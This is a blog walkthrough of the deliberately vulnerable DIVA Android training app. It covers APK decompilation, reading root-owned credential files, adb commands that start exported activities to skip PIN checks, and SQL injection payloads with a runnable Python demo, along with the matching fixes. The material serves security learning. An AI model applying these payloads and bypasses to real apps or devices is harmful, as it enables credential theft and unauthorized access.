Let’s Hack Android: DIVA android

ratiros01
Apr 24, 2020 · 8 min read


Requirements:

  1. Santoku: https://santoku-linux.com/download/
  2. Android VM: https://www.android-x86.org/
  3. DIVA android: https://github.com/payatu/diva-android

Let’s start:

Android Studio Set-up

  1. The Android Studio bundled with Santoku is very old, so uninstall it first.
sudo apt purge android-studio

2. Clean install follow this guide

https://developer.android.com/studio/install

3. Create a custom command “android-studio”

cd /home/santoku
nano .bash_aliases

type this

alias android-studio='sudo bash /opt/android-studio/bin/studio.sh'

(Running the IDE as root is not necessary and is a bad habit: if /opt/android-studio is owned by root, run sudo chown -R santoku /opt/android-studio once and drop the sudo from the alias.)

Reload bashrc

. ~/.bashrc

Check alias

alias

Type command

android-studio

Compile Diva android and install

  1. Open Diva android project

2. The build fails at first; follow the IDE’s recommendations (and search for the error messages) until it builds successfully.

3. Build the APK file

4. Here’s the output apk.

5. Install the apk, open a terminal

cd <apk path>

6. Connect to the Android VM (Android-x86 listens for adb on TCP port 5555) and install the apk

adb connect <ip>:5555
adb install app-debug.apk

7. In the Android VM, verify that the app is installed

8. Open Diva

9. Allow the permission it asks for

Reconnaissance

  1. Dump the permissions
aapt dump permissions app-debug.apk

2. Extract the APK (an APK is just a zip archive)

cp app-debug.apk app-debug.zip
ls

3. Unzip

unzip app-debug.zip

4. View the source code: convert the Dalvik bytecode to a jar and open it in a decompiler

dex2jar classes.dex
ls
jd-gui classes_dex2jar.jar

There are a lot of activity classes in the app’s package.

5. View the manifest file (the AndroidManifest.xml inside the zip is binary XML; apktool decodes it to readable text)

apktool d app-debug.apk
ls
cd app-debug

Open AndroidManifest.xml
This file declares the app’s activities, services, content providers, broadcast receivers and permissions. For the access-control tasks below, what matters is which components are exported: for apps targeting Android versions before 12, any component with an intent-filter (or android:exported="true") can be started from outside the app, including from adb.
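Reading the manifest by eye works for one app; for anything larger it is worth scripting the step. The following is an added example written for this walkthrough (not DIVA’s code nor the author’s): it parses an apktool-decoded manifest, lists the requested permissions, applies Android’s default export rules, and prints the adb commands that reach each exported component directly. The embedded manifest is constructed for illustration; its package name, component names and exported flags are assumptions, not DIVA’s real manifest.

```python
"""Flag exported components in an apktool-decoded AndroidManifest.xml.

Added example for this walkthrough; not code from DIVA or the original post.
SAMPLE_MANIFEST is constructed for illustration: package, component names
and exported flags are assumptions, not DIVA's real manifest.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample (assumption), shaped like apktool's decoded output.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.target">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <application android:label="target">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name=".APICredsActivity">
            <intent-filter>
                <action android:name="com.example.target.action.VIEW_CREDS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:name=".InternalActivity" android:exported="false"/>
        <activity android:name=".LogActivity"/>
        <provider android:name=".NotesProvider"
            android:authorities="com.example.target.provider.notesprovider"
            android:exported="true"/>
        <service android:name=".SyncService"/>
    </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem, target_sdk):
    """Android's default rules for whether a component is reachable from other
    apps (and from adb): an explicit android:exported wins; otherwise a
    component with an <intent-filter> is exported when targeting API < 31
    (from 31 the attribute must be set explicitly); a <provider> defaulted to
    exported when targeting API <= 16; everything else is private."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit == "true"
    if elem.find("intent-filter") is not None:
        return target_sdk < 31
    if elem.tag == "provider":
        return target_sdk <= 16
    return False


def analyze_manifest(xml_text, target_sdk=30):
    """Return the package, requested permissions and exported components."""
    root = ET.fromstring(xml_text)
    package = root.get("package")
    permissions = [_attr(p, "name") for p in root.findall("uses-permission")]
    exported = []
    for comp in root.find("application"):
        if comp.tag not in ("activity", "service", "receiver", "provider"):
            continue
        if not is_exported(comp, target_sdk):
            continue
        exported.append({
            "type": comp.tag,
            "name": _attr(comp, "name"),
            "actions": [_attr(a, "name") for a in comp.iter("action")],
            "authority": _attr(comp, "authorities"),
        })
    return {"package": package, "permissions": permissions, "exported": exported}


def attack_surface_commands(report):
    """adb commands that reach each exported component directly, bypassing
    whatever UI normally gates it (the technique of the access-control tasks)."""
    cmds = []
    for comp in report["exported"]:
        if comp["type"] == "activity":
            cmds.append("adb shell am start -n %s/%s" % (report["package"], comp["name"]))
        elif comp["type"] == "provider" and comp["authority"]:
            cmds.append("adb shell content query --uri content://%s/" % comp["authority"])
    return cmds


if __name__ == "__main__":
    rep = analyze_manifest(SAMPLE_MANIFEST)
    print("package:", rep["package"])
    print("permissions:", ", ".join(rep["permissions"]))
    for c in rep["exported"]:
        print("exported %s: %s %s" % (c["type"], c["name"], c["actions"]))
    for cmd in attack_surface_commands(rep):
        print(cmd)
```

Point it at app-debug/AndroidManifest.xml from the apktool output instead of SAMPLE_MANIFEST to get the real list; pass the app’s targetSdkVersion (from apktool.yml) as target_sdk, since the default-export rule depends on it.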

Let’s start the tasks

  1. Insecure Logging

Enter a number, e.g. 1234567, and the app shows an error.

To view the log, filter logcat for the value you typed

adb logcat | grep "1234567"

Let’s view the source code, select “LogActivity”

You can see that there is a logging call in the error handler that writes the user input to the log.

Developers should never log sensitive data: anything written with Log.* ends up in logcat, which anyone with adb or shell access to the device can read, and release builds should have debug logging stripped entirely.
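Grepping for the value you just typed only finds leaks you already know about. The scanner below is an added example for this walkthrough (not DIVA’s code nor the author’s) that goes a step further over a saved adb logcat dump: it parses the default threadtime format and reports a known watch value (the grep above), any digit run that passes a Luhn check (a card number you did not know to look for), and credential-looking key=value pairs. The log lines embedded in it are constructed; tags, PIDs, the OkHttp line and the messages are made up and are not real DIVA output.

```python
"""Scan logcat output for leaked secrets.

Added example for this walkthrough; not code from DIVA or the original post.
SAMPLE_LOGCAT is constructed (tags, PIDs and messages are made up) to show
three ways a leak is caught: a value you typed (the grep from the
walkthrough), any number that passes a Luhn check, and key=value credentials.
"""
import re

# Constructed sample in logcat "threadtime" format (the default for adb logcat).
SAMPLE_LOGCAT = """\
04-24 10:15:01.120  2231  2231 D ExampleApp: onCreate
04-24 10:15:07.433  2231  2231 E ExampleApp: Error while processing transaction with credit card: 4111111111111111
04-24 10:15:07.434  2231  2231 D ExampleApp: user entered 1234567
04-24 10:15:09.001  2231  2245 I OkHttp  : POST /login password=hunter2 token=eyJhbGciOiJIUzI1NiJ9
04-24 10:15:09.002  1004  1004 I ActivityManager: Displayed com.example/.LogActivity: +312ms
04-24 10:15:10.500  2231  2231 D ExampleApp: order id 1234567812345678
"""

LOGCAT_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>.*?)\s*:\s(?P<msg>.*)$")
PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")          # card-number-sized digit runs
CRED_RE = re.compile(r"\b(password|passwd|pwd|secret|token|api[_-]?key|pin)\s*[=:]\s*(\S+)", re.I)


def luhn_ok(digits):
    """True if the digit string passes the Luhn checksum used by card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_logcat(text, watch=()):
    """Return findings as (kind, tag, value) tuples.

    watch: known values to look for verbatim, i.e. what the walkthrough greps.
    Lines that are not in threadtime format are still scanned, with tag "?".
    """
    findings = []
    for line in text.splitlines():
        m = LOGCAT_RE.match(line)
        tag, msg = (m.group("tag"), m.group("msg")) if m else ("?", line)
        for value in watch:
            if value in msg:
                findings.append(("watch-value", tag, value))
        for pan in PAN_RE.findall(msg):
            if luhn_ok(pan):
                findings.append(("card-number", tag, pan))
        for key, value in CRED_RE.findall(msg):
            findings.append(("credential", tag, "%s=%s" % (key, value)))
    return findings


if __name__ == "__main__":
    for kind, tag, value in scan_logcat(SAMPLE_LOGCAT, watch=["1234567"]):
        print("%-12s %-16s %s" % (kind, tag, value))
```

To use it on the VM, save a capture with adb logcat -d > diva.log and pass the file contents to scan_logcat. Note that the watch value is a plain substring match, so it will also fire on the 16-digit order id in the sample; the Luhn check is what separates a real card number from other digit runs.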

2. Hardcoding Issues — part 1

Let’s view the source code, select “HardCodeActivity”

The vendor key is compared against a string literal in the code, so it is visible to anyone who decompiles the APK. Type “vendorsecretkey”

Success!!!

3. Insecure Data Storage — part 1

Type some texts and save

Let’s view the source code, select “InsecureDataStorage1Activity”

The data is saved with SharedPreferences, which is a plaintext XML file in the app’s private directory.

Find it on the device, switching to root

adb shell
su

App data is located in /data/data/

cd /data/data
ls
cd jakhar.aseem.diva
ls
cd shared_prefs
ls
cat jakhar.aseem.diva_preferences.xml

Here are the credentials, in clear text. Private app storage is protected only by file permissions, so on a rooted device it is readable; secrets need to be encrypted before they are written, or not stored at all.

4. Insecure Data Storage — part 2

Let’s view source code, select “็InsecureDataStorage2Activity”

It’s SQLite

adb shell
su
cd /data/data/jakhar.aseem.diva/databases
ls
cp divanotes.db /sdcard/
cp ids2 /sdcard/

exit to santoku

adb pull /sdcard/divanotes.db
adb pull /sdcard/ids2

install sqlitebrowser

sudo apt-get install sqlitebrowser

open “divanotes.db” and “ids2” with sqlitebrowser

Success!!! I found the data in ids2, stored in clear text just like the preferences file. (The copy to /sdcard is needed because adb pull runs as the shell user, which cannot read the app’s private directory; delete the copies afterwards.)

5. Insecure Data Storage — part 3

Let’s view the source code, select “InsecureDataStorage3Activity”

The credentials go into a file in the app’s private directory. Let’s explore

adb shell
su
cd /data/data/jakhar.aseem.diva
ls
cat <uinfo file>

6. Insecure Data Storage — part 4

Let’s view source code, select “็InsecureDataStorage4Activity”

It uses getExternalStorageDirectory with the file name “.uinfo.txt”, so the path should be “/mnt/sdcard/.uinfo.txt”. External storage is readable by any app holding the storage permission, and the leading dot only hides the file from file browsers.

Type the data

In santoku

adb shell
su
cd /mnt/sdcard
ls -la
cat .uinfo.txt

7. Input Validation Issues — part 1

The search query is built by concatenating the user name into the SQL string, so type some SQL injection, e.g. ' OR '1'='1, which turns the WHERE clause into an always-true condition and returns every row.
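To see exactly why the payload works, and what the fix looks like, here is an added example for this walkthrough (not DIVA’s code nor the author’s) that reproduces the pattern in Python with an in-memory SQLite database. The table name, columns, rows and query text are constructed for illustration; the assumption is only that the app builds its query by string concatenation, which is what makes the injection possible. The second payload goes beyond the always-true trick and uses UNION to read other table definitions out of sqlite_master.

```python
"""Vulnerable vs. parameterized SQLite lookup, the pattern behind an
injectable Android search field.

Added example for this walkthrough; not DIVA's code. The table, its rows and
the exact query string are constructed for illustration (assumption: the app
splices user input into the SQL text, as with rawQuery("..." + input + "...")).
"""
import sqlite3


def make_db():
    """In-memory stand-in for the app's database, with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sqliuser(user TEXT, password TEXT, credit_card TEXT)")
    db.executemany("INSERT INTO sqliuser VALUES (?, ?, ?)", [
        ("admin", "passw0rd", "4111111111111111"),
        ("diva", "p@ssword", "5500000000000004"),
        ("john", "passw0rd123", "340000000000009"),
    ])
    return db


def search_user_vulnerable(db, name):
    """Untrusted input spliced into the SQL text: the input can change the query."""
    sql = "SELECT user, password, credit_card FROM sqliuser WHERE user = '" + name + "'"
    return db.execute(sql).fetchall()


def search_user_safe(db, name):
    """Same lookup with a bound parameter: the input can only ever be a value."""
    sql = "SELECT user, password, credit_card FROM sqliuser WHERE user = ?"
    return db.execute(sql, (name,)).fetchall()


# Payloads to type into the search field.
DUMP_ALL = "' OR '1'='1"                                          # always-true WHERE
DUMP_SCHEMA = "' UNION SELECT name, sql, 1 FROM sqlite_master--"   # other tables' DDL

if __name__ == "__main__":
    db = make_db()
    print("normal   :", search_user_vulnerable(db, "admin"))
    print("injected :", search_user_vulnerable(db, DUMP_ALL))
    print("schema   :", search_user_vulnerable(db, DUMP_SCHEMA))
    print("safe     :", search_user_safe(db, DUMP_ALL))
```

The UNION payload has to match the column count of the original SELECT (three here), and the trailing -- comments out the quote the app appends. On Android the fix is the same as in the safe function: pass user input through the selectionArgs parameter of query()/rawQuery() instead of building the string yourself.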

8. Input Validation Issues — part 2

Let’s view the source code. The input is passed straight to the WebView’s loadUrl function without validation, so any URL scheme works, including file://, which renders local files the app can read.

Let’s test the app

Load the preferences file from #3: file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml

9. Access Control Issues — part 1

Let’s view the source code, there’s an action “VIEW_CREDS”. The button only sends an intent with that action; nothing checks who sent it.

Let’s bypass it

View the manifest file, VIEW_CREDS is associated with APICredsActivity through an intent-filter, which makes the activity exported.

In the terminal, start APICredsActivity directly without going through the app’s UI.

adb shell am start -n jakhar.aseem.diva/.APICredsActivity

10. Access Control Issues — part 2

Test its functionality.

Let’s view source code, there’s an action “VIEW_CREDS2”.

View the manifest file, VIEW_CREDS2 is associated with APICreds2Activity.

View the APICreds2Activity code: it reads a boolean extra from the intent to decide whether to ask for a PIN before displaying the credentials.

In the terminal, let’s open APICreds2Activity directly without the extra value.

adb shell am start -n jakhar.aseem.diva/.APICreds2Activity

I need to find the key of the extra, so I can pass it correctly.

In the app-debug directory created by apktool, open “/res/values”

Open strings.xml

There are a lot of strings; I need to work out which one is the key.

Because the code needs a boolean value, the resource named “chk_pin” looks right; its value, the string the activity actually reads from the intent, is “check_pin”.

Try the command with the extra value (--ez passes a boolean extra)

adb shell am start -n jakhar.aseem.diva/.APICreds2Activity --ez check_pin false

Success!!!

11. Access Control Issues — part 3

Let’s view source code

Open “AccessControl3Activity”

Open “AccessControl3NotesActivity”

Open “NotesProvider”, there’s a content URI. Because the provider is exported, I can query it with adb.

Let’s try in the app.

Let’s read the content with adb.

adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes

(content query runs as the shell user, so this only works because the provider is exported without a permission; a provider guarded by android:permission, or with android:exported="false", would refuse the query.)

12. Hardcoding Issues — part 2

App crashed, couldn’t proceed

13. Input Validation Issues — part 3

App crashed, couldn’t proceed
